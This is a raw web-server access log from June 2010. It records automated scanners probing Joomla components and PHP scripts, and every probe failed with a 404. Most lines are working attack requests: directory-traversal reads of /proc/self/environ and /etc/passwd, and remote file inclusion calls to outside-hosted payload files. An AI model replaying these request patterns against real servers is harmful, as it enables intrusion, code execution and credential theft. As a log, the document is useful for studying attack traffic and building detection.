61.110.10.185 - - [10/Jun/2010:01:23:35 -0500] "GET /logs/access_log.1271376000//atom.php5?page=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.158.187 - - [10/Jun/2010:01:23:39 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:23:39 -0500] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:23:39 -0500] "GET /logs/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
202.63.240.21 - - [10/Jun/2010:01:23:56 -0500] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""libwww-perl/5.835"
202.63.240.21 - - [10/Jun/2010:01:23:56 -0500] "GET /inc/cmses/aedatingCMS.php?dir[inc]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""libwww-perl/5.835"
118.129.166.213 - - [10/Jun/2010:01:24:41 -0500] "GET /logs/access_log.1274313600/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
174.121.64.231 - - [10/Jun/2010:01:24:59 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:24:59 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:24:59 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:25:01 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
118.129.166.213 - - [10/Jun/2010:01:25:24 -0500] "GET /logs/access_log.1274313600/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
174.121.158.187 - - [10/Jun/2010:01:25:49 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:25:49 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
211.203.180.144 - - [10/Jun/2010:01:26:26 -0500] "GET //inc/header.php/step_one.php?server_inc=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.203.180.144 - - [10/Jun/2010:01:26:26 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
211.203.180.144 - - [10/Jun/2010:01:26:27 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
207.46.204.244 - - [10/Jun/2010:01:29:08 -0500] "GET /logs/access_log.1252022400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.158.187 - - [10/Jun/2010:01:29:44 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:29:45 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
61.110.10.185 - - [10/Jun/2010:01:31:20 -0500] "GET //config/dbutil.bck.php?confdir=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
61.110.10.185 - - [10/Jun/2010:01:31:20 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.110.10.185 - - [10/Jun/2010:01:31:20 -0500] "GET /logs/access_log.1271548800//config/dbutil.bck.php?confdir=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
61.110.10.185 - - [10/Jun/2010:01:31:49 -0500] "GET /logs/access_log.1271548800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
61.110.10.185 - - [10/Jun/2010:01:31:49 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
61.110.10.185 - - [10/Jun/2010:01:31:49 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
207.191.229.96 - - [10/Jun/2010:01:32:04 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.191.229.96 - - [10/Jun/2010:01:32:05 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.195.112.180 - - [10/Jun/2010:01:32:18 -0500] "GET /logs/access_log.1186963200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.110.10.185 - - [10/Jun/2010:01:32:36 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
61.110.10.185 - - [10/Jun/2010:01:32:37 -0500] "GET /logs/access_log.1271548800//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.110.10.185 - - [10/Jun/2010:01:32:37 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
173.236.27.26 - - [10/Jun/2010:01:33:13 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.27.26 - - [10/Jun/2010:01:33:13 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.27.26 - - [10/Jun/2010:01:33:16 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
196.36.153.253 - - [10/Jun/2010:01:33:32 -0500] "GET //index.php?option=com_jeformcr&view=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
196.36.153.253 - - [10/Jun/2010:01:33:32 -0500] "GET /logs//index.php?option=com_jeformcr&view=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
196.36.153.253 - - [10/Jun/2010:01:33:33 -0500] "GET //index.php?option=com_jeformcr&view=./../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
196.36.153.253 - - [10/Jun/2010:01:33:33 -0500] "GET /logs//index.php?option=com_jeformcr&view=./../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
61.110.10.185 - - [10/Jun/2010:01:33:54 -0500] "GET //Neos_Chronos/header.php?base_folder=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
61.110.10.185 - - [10/Jun/2010:01:33:54 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.110.10.185 - - [10/Jun/2010:01:33:54 -0500] "GET /logs/access_log.1271548800//Neos_Chronos/header.php?base_folder=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.169.249.251 - - [10/Jun/2010:01:34:37 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.169.249.251 - - [10/Jun/2010:01:34:38 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.169.249.251 - - [10/Jun/2010:01:34:38 -0500] "GET /logs//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.169.249.251 - - [10/Jun/2010:01:34:46 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.169.249.251 - - [10/Jun/2010:01:34:46 -0500] "GET //index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.169.249.251 - - [10/Jun/2010:01:34:46 -0500] "GET /logs//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.241.179.30 - - [10/Jun/2010:01:35:51 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
212.241.179.30 - - [10/Jun/2010:01:35:53 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
211.169.249.251 - - [10/Jun/2010:01:36:19 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.169.249.251 - - [10/Jun/2010:01:36:19 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
61.110.10.185 - - [10/Jun/2010:01:36:21 -0500] "GET /logs/access_log.1271548800//agendax/addevent.inc.php?agendax_path=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
61.110.10.185 - - [10/Jun/2010:01:36:21 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
61.110.10.185 - - [10/Jun/2010:01:36:21 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://homestay.blog21.co.kr/ch_bbs/www/Ckrid1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
173.236.27.26 - - [10/Jun/2010:01:38:04 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
173.236.27.26 - - [10/Jun/2010:01:38:04 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.27.26 - - [10/Jun/2010:01:38:05 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.236.27.26 - - [10/Jun/2010:01:38:05 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
173.236.27.26 - - [10/Jun/2010:01:38:05 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.27.26 - - [10/Jun/2010:01:38:05 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.236.27.26 - - [10/Jun/2010:01:39:06 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
173.236.27.26 - - [10/Jun/2010:01:39:06 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.27.26 - - [10/Jun/2010:01:39:06 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:39:32 -0500] "GET /logs/access_log.1274572800//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:39:32 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:39:32 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:39:43 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:39:44 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:39:45 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:39:45 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
65.55.51.111 - - [10/Jun/2010:01:40:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.158.187 - - [10/Jun/2010:01:40:23 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:40:23 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:40:23 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:40:37 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:40:38 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
65.55.51.111 - - [10/Jun/2010:01:40:54 -0500] "GET /logs/access_log.1181692800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.64.231 - - [10/Jun/2010:01:42:45 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:42:47 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:43:51 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:43:56 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:44:08 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:44:19 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
208.115.111.248 - - [10/Jun/2010:01:44:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
174.121.158.187 - - [10/Jun/2010:01:48:39 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:48:39 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
95.72.246.3 - - [10/Jun/2010:01:50:09 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://ru.wikipedia.org/wiki/%D0%9D%D0%B0%D1%80%D0%BE%D0%B4%D0%BD%D1%8B%D0%B9_%D0%BA%D0%BE%D1%81%D1%82%D1%8E%D0%BC""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
95.72.246.3 - - [10/Jun/2010:01:50:15 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
174.121.158.187 - - [10/Jun/2010:01:51:12 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:51:12 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:51:24 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:51:24 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:51:46 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:53:22 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:53:23 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:53:23 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:53:29 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:53:46 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:53:46 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:54:18 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.64.231 - - [10/Jun/2010:01:54:18 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:54:23 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:54:23 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:55:15 -0500] "GET /logs//index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:55:15 -0500] "GET //index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.195.112.180 - - [10/Jun/2010:01:56:01 -0500] "GET /logs/access_log.1171238400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.93.201.141 - - [10/Jun/2010:01:56:02 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
195.93.201.141 - - [10/Jun/2010:01:56:02 -0500] "GET //index.php?option=com_dwgraphs&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
195.93.201.141 - - [10/Jun/2010:01:56:02 -0500] "GET //index.php?option=com_dwgraphs&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
195.93.201.141 - - [10/Jun/2010:01:56:02 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
174.121.158.187 - - [10/Jun/2010:01:56:37 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:56:37 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:57:37 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.158.187 - - [10/Jun/2010:01:57:38 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.227.143.132 - - [10/Jun/2010:01:58:55 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
69.16.227.125 - - [10/Jun/2010:01:59:02 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
200.226.134.29 - - [10/Jun/2010:01:59:07 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
200.226.134.29 - - [10/Jun/2010:01:59:07 -0500] "GET //index.php?option=com_weberpcustomer&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
200.226.134.29 - - [10/Jun/2010:01:59:08 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
200.226.134.29 - - [10/Jun/2010:01:59:08 -0500] "GET //index.php?option=com_weberpcustomer&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
173.236.27.26 - - [10/Jun/2010:01:59:43 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
173.236.27.26 - - [10/Jun/2010:01:59:44 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
173.236.27.26 - - [10/Jun/2010:02:01:15 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
196.36.153.253 - - [10/Jun/2010:02:03:11 -0500] "GET /logs//index.php?option=com_userstatus&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
196.36.153.253 - - [10/Jun/2010:02:03:11 -0500] "GET //index.php?option=com_userstatus&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
196.36.153.253 - - [10/Jun/2010:02:03:11 -0500] "GET /logs//index.php?option=com_userstatus&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 299 "-""-"
196.36.153.253 - - [10/Jun/2010:02:03:11 -0500] "GET //index.php?option=com_userstatus&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
69.175.83.34 - - [10/Jun/2010:02:06:09 -0500] "GET /logs//appserv/main.php?appserv_root=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
69.175.83.34 - - [10/Jun/2010:02:06:09 -0500] "GET //appserv/main.php?appserv_root=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
69.175.83.34 - - [10/Jun/2010:02:06:09 -0500] "GET /logs/access_log.1274572800%20%20//appserv/main.php?appserv_root=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.46.199.179 - - [10/Jun/2010:02:11:05 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.32.58.140 - - [10/Jun/2010:02:16:00 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.203.180.144 - - [10/Jun/2010:02:16:40 -0500] "GET /config.php?path_to_root=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
